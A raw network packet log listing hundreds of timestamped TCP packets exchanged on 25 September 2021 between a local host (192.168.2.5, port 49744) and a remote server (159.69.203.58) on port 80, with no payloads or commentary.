Sep 25, 2021 10:15:04.125830889 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.125834942 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.125849009 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.125871897 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.125885010 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.125890017 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.125894070 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.125916004 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.125925064 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.125929117 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.125941992 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.125965118 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.125966072 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.125968933 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.125988007 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.125994921 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.126008034 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.126010895 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.126029015 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.126034021 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.126055956 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.126075029 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.126077890 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.126080036 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.126100063 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.126112938 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.126116991 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.126126051 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.126183987 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.126188993 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.126502991 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.126526117 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.126548052 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.126569986 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.126588106 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.126595974 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.126600027 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.126619101 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.126840115 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.126864910 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.126885891 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.126907110 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.126912117 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.126912117 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.126935959 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.126956940 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.126959085 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.126961946 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.126980066 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127002001 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127015114 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127021074 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127023935 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127046108 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127047062 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127049923 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127068996 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127094030 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127094984 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127099991 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127134085 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127139091 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127144098 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127157927 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127180099 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127199888 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127202034 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127204895 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127226114 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127233982 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127252102 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127254009 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127311945 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127316952 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127338886 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127382994 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127405882 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127422094 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127427101 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127429008 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127450943 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127492905 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127499104 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127510071 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127537012 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127553940 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127561092 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127561092 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127580881 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127604008 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127616882 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127626896 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127652884 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127667904 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127674103 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127677917 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127701044 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127722979 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127727985 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127733946 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127744913 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127768040 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127770901 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127774954 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127796888 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127819061 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127821922 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127823114 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127851963 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127870083 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127875090 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127876997 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127902031 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127922058 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127924919 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127924919 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127949953 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127971888 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.127974033 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.127974987 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.128030062 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.128036022 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.128608942 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.128633976 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.128657103 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.128679991 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.128689051 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.128719091 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.128721952 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.128727913 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.130194902 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.130222082 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.130244017 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.130265951 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.130280018 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.130299091 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.130301952 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.130310059 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.130708933 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.130732059 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.130753994 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.130775928 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.130788088 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.130795956 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.130799055 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.130809069 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.130820990 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.130853891 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.130858898 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.130906105 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.140255928 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.140281916 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.140304089 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.140325069 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.140346050 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.140351057 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.140369892 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.140374899 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.140376091 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.140379906 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.140387058 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.140414000 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.148071051 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.148098946 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.148119926 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.148204088 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.148236036 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.148426056 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.148448944 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.148471117 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.148488998 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.148508072 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.148531914 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.148546934 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.148556948 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.148560047 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.148581028 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.148603916 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.148622036 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.148627043 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.148627996 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.148629904 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.148647070 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.148664951 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.148688078 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.148693085 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.148713112 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.148736954 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.148746014 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.148751974 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.148758888 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.148783922 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.148803949 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.148808002 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.148808956 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.148829937 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.148853064 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.148855925 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.148861885 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.148874998 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.148988008 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.149465084 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.149492025 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.149517059 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.149540901 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.149579048 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.149599075 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.149601936 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.151985884 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.152035952 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.152115107 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.152122974 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.152144909 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.152183056 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.152298927 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.152323961 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.308641911 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.310750008 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.590714931 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.613969088 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.614029884 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.614074945 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.614090919 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.614108086 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.614130020 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.614157915 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.614170074 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.614209890 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.614239931 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.614243031 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.614276886 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.614319086 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.614433050 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.615112066 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.615207911 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.615247965 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.615251064 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.615293026 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.615303993 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.615344048 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.615384102 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.615421057 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.615426064 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.615431070 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.615474939 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.615511894 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.615523100 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.615529060 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.615550041 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.615588903 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.615626097 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.615664005 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.615664005 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.615669012 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.615704060 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.615751982 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.615782976 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.615787983 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.616161108 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.636782885 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.636894941 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.636945009 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.636990070 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.637023926 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.637037039 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.637061119 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.637068033 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.637072086 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.637105942 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.637190104 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.637228012 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.637258053 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.637289047 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.637300968 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.637315035 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.637320042 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.637320995 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.637335062 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.637351990 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.637382030 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.637411118 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.637423992 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.637437105 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.637442112 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.637453079 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.637465954 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.637485981 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.637517929 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.637542009 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.637552977 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.637777090 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.637779951 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.637811899 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.637842894 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.637866974 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.637872934 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.637876987 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.637900114 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.637904882 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.637923002 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.637947083 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.637952089 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.637972116 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.637996912 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.638027906 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.638056993 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.638077974 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.638087034 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.638088942 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.638092995 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.638106108 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.638117075 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.638142109 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.638154030 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.638159990 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.638211012 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.638247967 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.638262987 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.638271093 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.638287067 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.638334036 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.638338089 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.638343096 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.638380051 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.638421059 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.638437986 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.638444901 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.638468981 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.638516903 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.638524055 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.638530970 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.638581038 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.638592005 CEST	49744	80	192.168.2.5	159.69.203.58
